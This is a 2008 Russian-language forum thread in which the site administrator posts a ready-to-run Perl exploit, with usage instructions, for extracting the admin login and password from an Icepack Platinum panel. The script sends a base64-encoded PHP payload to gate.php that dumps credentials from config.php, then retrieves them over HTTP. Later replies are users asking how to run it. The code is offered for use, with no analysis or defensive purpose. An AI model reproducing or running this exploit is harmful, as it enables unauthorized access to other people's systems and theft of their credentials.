|
эксплойт для получения имени пользователя и пароля от админк
|
|
| sir-Voland |
Дата: Вт, 25.03.2008, 10:20 | Сообщение # 1 |
Хозяин сайта
Группа: Администраторы
Сообщений: 1076 
Ник: sir-Voland
Группа: Администраторы
Посты: 1076
Репутация: 17
|
Выкладываю эксплойт для получения имени пользователя и пароля от админки Icepack Platinum(Тестилось на ней)
Юзоть так ./iceloit.pl http://адресс/
Например
./iceloit.pl "http://www.antosha.kg/spl/" Code #!/usr/bin/perl
## CyberMaster 6.08.2007
## ICQ: 910019
use LWP::UserAgent;
my $ua = LWP::UserAgent->new;
$ua->agent("CyberMaster");
$evil_code = "PD8NCmluY2x1ZGUoJy4uL2NvbmZpZy5waHAnKTsNCmVjaG8gJGNvbmZpZ1sn
YWRtaW5fbmFtZSddLic6Jy4kY29uZmlnWydhZG1pbl9wYXNzJ107DQo/Pg==";
$IcePath = $ARGV[0];
sub myIP{
my $response = $ua->get('http://ipget.totalh.com/');
if ($response->is_success) {
return $response->content;
}
else {
return 0;
die $response->status_line;
}
}
sub explot{
my $req = HTTP::Request->new(POST => $IcePath."gate.php");
$req->content_type('application/x-www-form-urlencoded');
$req->content("a=aaa&b=bbb&c=$evil_code");
my $res = $ua->request($req);
}
sub getPass{
$ip = myIP();
explot();
my $response = $ua->get($IcePath."load/".$ip.".php");
if ($response->is_success) {
return $response->content;
}
else {
return "Error?!";
}
}
$resut = getPass();
print "Admin username and password:\n$resut";
 |
|
|
| |
| Aspen |
Дата: Вт, 25.03.2008, 21:10 | Сообщение # 2 |
| Серебряный пользователь
Группа: Пользователи
Сообщений: 189
Ник: Aspen
Группа: Пользователи
Посты: 189
Репутация: 11 |
Так так так, а можно немного поподробней!
  |
|
|
| |
| sir-Voland |
Дата: Вт, 25.03.2008, 21:34 | Сообщение # 3 |
|
Хозяин сайта
Группа: Администраторы
Сообщений: 1076
Ник: sir-Voland
Группа: Администраторы
Посты: 1076
Репутация: 17
|
Aspen, Это код на перле
|
|
|
| |
| Aspen |
Дата: Вт, 25.03.2008, 21:39 | Сообщение # 4 |
| Серебряный пользователь
Группа: Пользователи
Сообщений: 189
Ник: Aspen
Группа: Пользователи
Посты: 189
Репутация: 11
|
Да я понимаю но что с ним зделать!
Засунуть на хост в блокноте! перейти по ссылке и всё воаля? 
Я не шарю в перле вообще
|
|
|
| |
| sir-Voland |
Дата: Вт, 25.03.2008, 21:43 | Сообщение # 5 |
|
Хозяин сайта
Группа: Администраторы
Сообщений: 1076
Ник: sir-Voland
Группа: Администраторы
Посты: 1076
Репутация: 17
|
Aspen, Ну типа того
|
|
|
| |
| Aspen |
Дата: Вт, 25.03.2008, 21:52 | Сообщение # 6 |
| Серебряный пользователь
Группа: Пользователи
Сообщений: 189
Ник: Aspen
Группа: Пользователи
Посты: 189
Репутация: 11
|
Quote (sir-Voland) Ну типа того
Спасибо дорой админестратор! За полный, внятный ответ! Вопрос: зачем что-то выкладывать (без описания и правилами пользования) есле пользователи даже не знают для чего нужен материал и как им пользоваться?
|
|
|
| |
| sir-Voland |
Дата: Вт, 25.03.2008, 21:57 | Сообщение # 7 |
|
Хозяин сайта
Группа: Администраторы
Сообщений: 1076
Ник: sir-Voland
Группа: Администраторы
Посты: 1076
Репутация: 17
|
Aspen, Те кому он реально нужен, те знают, а кто не знает, лучне и не знать
|
|
|
| |
| Aspen |
Дата: Вт, 25.03.2008, 22:01 | Сообщение # 8 |
| Серебряный пользователь
Группа: Пользователи
Сообщений: 189
Ник: Aspen
Группа: Пользователи
Посты: 189
Репутация: 11
|
Мой случай! Я реально сильно хачу но я не знаю! И магу паспорить некто не знает на этом форуме!
|
|
|
| |
| sir-Voland |
Дата: Вт, 25.03.2008, 22:05 | Сообщение # 9 |
|
Хозяин сайта
Группа: Администраторы
Сообщений: 1076
Ник: sir-Voland
Группа: Администраторы
Посты: 1076
Репутация: 17
|
Aspen, Прохакер знает, по его совету выложил!
|
|
|
| |
| Kent |
Дата: Пт, 16.05.2008, 23:52 | Сообщение # 10 |
| Заглянувший
Группа: Пользователи
Сообщений: 5
Ник: Kent
Группа: Пользователи
Посты: 5
Репутация: 0
|
-------------------
Powered By Kent™ |
|
|
| |
| Aspen |
Дата: Пт, 16.05.2008, 23:58 | Сообщение # 11 |
| Серебряный пользователь
Группа: Пользователи
Сообщений: 189
Ник: Aspen
Группа: Пользователи
Посты: 189
Репутация: 11
|
Kent,
+1 согласен
|
|
|
| |
